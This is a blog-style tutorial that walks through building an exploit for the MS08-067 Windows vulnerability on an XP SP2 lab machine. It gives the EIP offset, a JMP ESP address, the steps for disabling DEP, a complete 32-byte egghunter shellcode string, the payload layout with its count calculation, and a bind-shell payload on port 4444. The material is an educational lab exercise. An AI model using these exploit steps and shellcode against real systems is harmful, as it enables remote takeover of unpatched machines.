MS08–067 Exploit Development
A Guide to writing an exploit for the famous MS08–067 vulnerability
Alright, straight to the point and no chit chat!
The Setup Environment 🛣
Vulnerable Machine
- Windows XP Service Pack 2 (32-bit)
- Immunity Debugger
Attacking Machine
First of all, make sure the POC script works! Open immunity debugger, attach svchost. Check my screenshot to make sure you attach the right service.
After running the script, you should have the same crash as the screenshot. Note that EIP is overwritten with 41414141.
With all that, it means you have all the requirements needed to proceed 🤘
Finding the Offset 🏢
I like to use an msf-pattern-create form kali and just put in a pattern of length 74 (because the POC has 74 A’s)
So this is what the exploit code should look like.
Take note of the value of EIP is after running that, 41366141
Then find the offset using the following command
Great, the offset is at 18.
Now modify the exploit script a little to verify if the offset is correct.
Controlling EIP 🕹
Unfortunately, none of the registers that point to our shellcode has enough space to store any shellcode big enough for a shell. It looks like the ESP register contains the remaining of our buffer (74–18–4=52) and has enough space to store our little egghunter payload which is 32 bytes.
So now find a JMP ESP instruction to replace EIP with. I used the one from ntdll.dll
7C941EED FFE4 JMP ESP ==> This will be our EIP replacementRe-attach the service on Immunity Debugger and set a breakpoint at address 7C941EED (JMP ESP). If everything goes smooth, the breakpoint should be hit and you will be redirected to the beginning of your ‘C’ payload
Stepping into (f7) brings us to the C buffers. Success! Continue..
The Obstacle🧗🏼♀️
Further along, some of you will get an access violation error. This is because of Data Execution Prevention (DEP) that Microsoft has implemented starting with Windows XP Service Pack 2 and Windows Server 2003. You can refer to the official documentation here. But for now, you can disable DEP by following the steps from this site. We will discuss DEP in the very next blog post. Stay tuned 😇
The Egghunter 🥚🎭
Generate an egghunter shellcode with egg w00t
C:\Documents and Settings\Owner\Desktop>egghunter.exe cstyle 0x77303074
// 32 byte egghunt shellcode (egg=0x77303074)unsigned char egghunt[] = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x74\x30\x30\x77\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
Since we know that ESP will contain our buffer, we can place our 32 byte egghunter shellcode there.
Also, change the Buffer content for the egghunter to find. xCC is like a breakpoint, so the execution will pause there when it reaches xCC, which will also indicate that our egghunter has found our egg.
Here is what it should look like if you got everything working correctly. Notice that the instruction at EIP is the xCC which we have written.
The Final Payload 💀
Generate a bind shell payload using msfvenom.
The Max Count and Actual Count (link attached to the line number in the script) in the exploit have to be adjusted so we can increase the size of our payload. The ServerUNC Buffer Content is where our buffer of xCC is.
This is what its going to look like
The calculation is as follows:
stub += 't00wt00w' + '\x90'*16 + buf
--------------MaxCount = ActualCount = (8 + 16 + 336+ 4)/2 = 182 = \xB6
When you run it, observe the command prompt on the left did not have port 4444 listening, and the command prompt on the right has port 4444 listening.
Thats it!🤘
If you followed through, you have successfully written an exploit for MS08–067. Let me know how it goes for you, if you have any questions please drop them in the comment section. Rock on!
